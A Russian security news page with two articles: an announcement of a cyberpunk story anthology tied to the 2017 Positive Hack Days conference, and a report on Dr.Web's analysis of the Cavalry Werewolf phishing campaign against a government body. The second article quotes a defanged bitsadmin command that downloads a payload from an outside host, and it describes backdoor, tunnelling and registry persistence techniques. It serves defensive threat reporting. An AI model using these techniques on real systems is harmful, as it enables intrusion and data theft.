Хакерскую конференцию анонсировали сборником киберпанка

Хакерскую конференцию анонсировали сборником киберпанка

Хакерскую конференцию анонсировали сборником киберпанка

Компания Positive Technologies представила сегодня сборник киберпанковских рассказов «Взломанное будущее». Книга, вышедшая в издательстве «Снежный Ком М» в серии «Настоящая Фантастика», собрана из рассказов победителей литературного конкурса, который проводится на ежегодном форуме по практической безопасности Positive Hack Days.

Идея конкурса возникла у организаторов PHDays три года назад, в рамках подготовки культурной программы конференции. «На одном из круглых столов PHDays мы обсуждали фантастику и обнаружили, что современная литература как-то обходит стороной профессию тех людей, которые собрались на этой конференции, ─ рассказал инициатор конкурса "Взломанное будущее", писатель-фантаст Алексей Андреев (также являющийся сотрудником PositiveTechnologies). ─ Представьте, вокруг идут доклады о том, как легко проникнуть через Интернет на атомную электростанцию или химический завод, в фойе проходят конкурсы по взлому банкоматов, мобильных телефонов и социальных сетей... а на лотках книжных магазинов в это время лежат какие-то старинные детективы. Практически никто из отечественных писателей не берётся осмыслить и адекватно отразить в литературе тот странный кибер-мир, который так цепко захватил всех нас».

Первый раз конкурс рассказов «Взломанное будущее», посвященный непростой жизни человека в мире глобальных коммуникаций и цифровых суррогатов, прошел в 2015 году. В жюри вошли Глеб Гусаков (писатель-фантаст, глава издательства «Снежный Ком М»), Алексей Андреев (он же Мерси Шелли, писатель-фантаст), Владислав Копп (бессменный ведущий передачи «Модель для сборки») и Сергей Чекмаев (писатель-фантаст, редактор проекта «Модель для сборки»). Выбранные ими рассказы-финалисты были переведены на английский и отправлены главному судье, одному из "отцов" жанра киберпанк, американскому писателю Брюсу Стерлингу. Он определил трех победителей, рассказы которых прочитала «Модель для сборки» со сцены конференции.

В 2016 году конкурс «Взломанное будущее» повторился, а его финалистов, вместе с финалистами первого года, было решено издать отдельной книгой. Глеб Гусаков, издатель и редактор серии «Настоящая Фантастика» в «Снежном Коме М», признался, что для него этот проект стал незаурядным событием: «И не только потому, что финалистов судил сам Брюс Стерлинг. Общее состояние отечественной фантастики ныне довольно плачевно, с выбором текстов для серии ─ а в ней публикуется только качественная, "умная" отечественная НФ ─ я с каждым годом испытываю всё большие затруднения. Что уж говорить о таком непростом жанре, как киберпанк? И тут ─ каскад отличных рассказов, среди которых несколько, не побоюсь этого слова, выдающихся».

Сергей Чекмаев в свою очередь отметил, что результаты конкурса получают очень хорошие отзывы от слушателей и читателей: «Слушатели программы "Модель для сборки" иногда упрекают меня, литературного редактора проекта, что рассказы, которые мы читаем, не соответствуют их ожиданиям. Разумеется, так бывает, если кто-то любит фэнтези, а мы ему предлагаем космооперу ─ и наоборот. Но организаторы PHDays с самого начала делали ставку на киберпанк, и я практически не слышал претензий по качеству текстов. Я сделал уже не один сборник тематической фантастики ─ книга "Взломанное будущее" стала юбилейной, 20-й. Но никогда раньше передо мной не стояла столь необычная задача: все мы ─ авторы, организаторы и жюри ─ попытались возродить жанр, который даже сами основатели много лет назад назвали умершим. И знаете, я думаю, что у нас получилось».

В этом году на суд жюри нового этапа конкурса уже прислали более 300 рассказов. Значительно расширилась и география, и возраст участников: самому юному писателю-киберпанку оказалось всего 9 лет. Известный российский фантаст Вадим Панов, приглашенный в этом году главным судьей конкурса, объявит победителей вечером 23 мая на очередной, уже седьмой по счету конференции Positive Hack Days.

О том, что будет происходить на этом глобальном форуме днем, рассказал Алексей Качалин, заместитель директора компании Positive Technologies по развитию бизнеса в России: «Мы каждый год собираем самые интересные доклады и семинары по offensive security, то есть по уязвимостям, методам атак и тестов на проникновение. Этот год ─ не исключение, но теперь мы активнее исследуем причины. Так, на конференции этого года будет целый поток докладов по безопасной разработке. С другой стороны, инциденты наносят максимальный ущерб, если активность злоумышленников долго остается необнаруженной ─ чтобы раскрыть эту тему, у нас оба дня будет проходить defensive track, на котором будет представлен опыт эксплуатации центров мониторинга безопасности (SOC) российских компаний ─ Ростелекома, Сбербанка и МТС, а также внутренних SOC глобальных вендоров – таких как SAP и Microsoft».

Алексей Качалин также напомнил, что центральная тема конференции этого года ─ безопасность Интернета вещей в условиях бурного развития ИТ-отрасли и проникновения «умных» устройств в бизнес и повседневную жизнь. Проблема будет обсуждаться под разными углами с представителями регуляторов, ведущими ИБ-исследователями и визионерами компаний, развивающих новые технологии. Поэтому все, кто хочет увидеть ИТ-будущее не в розовых очках рекламы, а в более реальном свете, еще раз приглашаются на PHDays VII. Конференция пройдет 23 ─ 24 мая 2017 в московском Центре международной торговли, программу и другие детали можно найти на сайте phdays.ru. 

AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

Группировка Cavalry Werewolf взломала сеть госоргана с помощью бэкдоров

В июле 2025 года к специалистам компании «Доктор Веб» обратился клиент из госсектора с жалобой на рассылку подозрительных писем с корпоративного почтового ящика. Расследование показало: перед ними была целевая кампания кибергруппировки, которую аналитики идентифицировали как Cavalry Werewolf.

Цель атаки — сбор конфиденциальной информации и картирование сети для дальнейшего закрепления внутри инфраструктуры.

Начали злоумышленники банально, но эффективно — с фишинга. В качестве «приманки» приходили архивы с паролем и вложенным бэкдором BackDoor.ShellNET.1 (основан на открытом проекте Reverse-Shell-CS). Файлы маскировались под служебные записки и другие официальные документы — имена были соответствующие, чтобы снизить бдительность получателя.

 

После запуска BackDoor.ShellNET.1 атакующие использовали стандартный для Windows инструмент bitsadmin для скачивания дополнительных полезных нагрузок (пример: bitsadmin /transfer www /download hxxp://…/winpot.exe). Среди загруженных модулей оказался стилер Trojan.FileSpyNET.5, который массово тянул документы (.doc/.docx/.xlsx/.pdf), текстовые файлы и изображения. Для скрытого доступа применяли BackDoor.Tunnel.41 (вариант ReverseSocks5) — с его помощью создавались SOCKS5-туннели и обеспечивалось скрытое подключение к заражённому ПК.

Дальше — больше: специалисты «Доктор Веб» обнаружили целый набор инструментов, как собственных, так и основанных на open-source. В арсенале группировки — скриптовые загрузчики (например, BAT.DownLoader.1138), «упакованные» трояны (Trojan.Packed2.49708, Trojan.Siggen31.54011 и т. п.), бэкдоры, управляемые через телеграм-ботов (BackDoor.Siggen2.5463, BackDoor.ShellNET.2), а также прокси-модули типа BackDoor.ReverseProxy.1. Некоторые варианты внедряли полезную нагрузку в легитимные процессы — например, инжектировали данные в aspnet_compiler.exe, чтобы бэкдор выполнялся в контексте доверенного приложения.

 

Интересно, что злоумышленники активно пользуются открытими решениями: либо берут код «как есть», либо модифицируют его под свои нужды. Для доставки следующей волны вредоносов они используют стандартные утилиты — PowerShell, bitsadmin, curl — а для сохранения присутствия в системе модифицируют автозагрузку через реестр (HKCU\...\Run) или ставят исполняемые файлы в C:\users\public\pictures и похожие публичные папки.

Атака Cavalry Werewolf показала типичную для целевых кампаний логику: разведка (whoami, ipconfig, просмотр директорий), проверка прокси и сети, затем загрузка инструментов и закрепление. Также злоумышленники могли позже использовать скомпрометированные устройства для перехода в другие сети — например, при смене работы жертвы — и разворачивать дальнейшие атаки через доверенные каналы.

Отдельные особенности группировки, которые отмечают аналитики «Доктор Веб»: предпочтение к open-source-инструментам, частое использование обратных шеллов и SOCKS-туннелей, внедрение вреда в видимо «безобидные» программы и управление через Telegram API. Фишинговые рассылки имитируют сообщения от государственных органов — это снижает подозрительность целевой аудитории и повышает шансы успешной компрометации.

Рекомендации для организаций — стандартный, но действенный набор мер: усилить фильтрацию почты и блокировку подозрительных вложений, ограничить возможность запуска bitsadmin/PowerShell неподписанных скриптов, включить контроль исполнения (application control) и EDR, регулярно проверять целевые публичные папки, применять многофакторную аутентификацию и оперативно реагировать на подозрительные соединения с неизвестными C2-адресами. При обнаружении инцидента — немедленно изолировать пострадавшие хосты и провести полноценную форензику, чтобы выявить степень компрометации.

Расследование «Доктор Веб» — ещё одно напоминание: даже крупные организации с государственным уровнем защиты уязвимы к грамотному фишингу и тому, что за ним следует. В современных целевых атаках именно сочетание человеческой ошибки и хорошо отлаженных инструментов злоумышленников делает наибольший ущерб.

AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

RSS: Новости на портале Anti-Malware.ru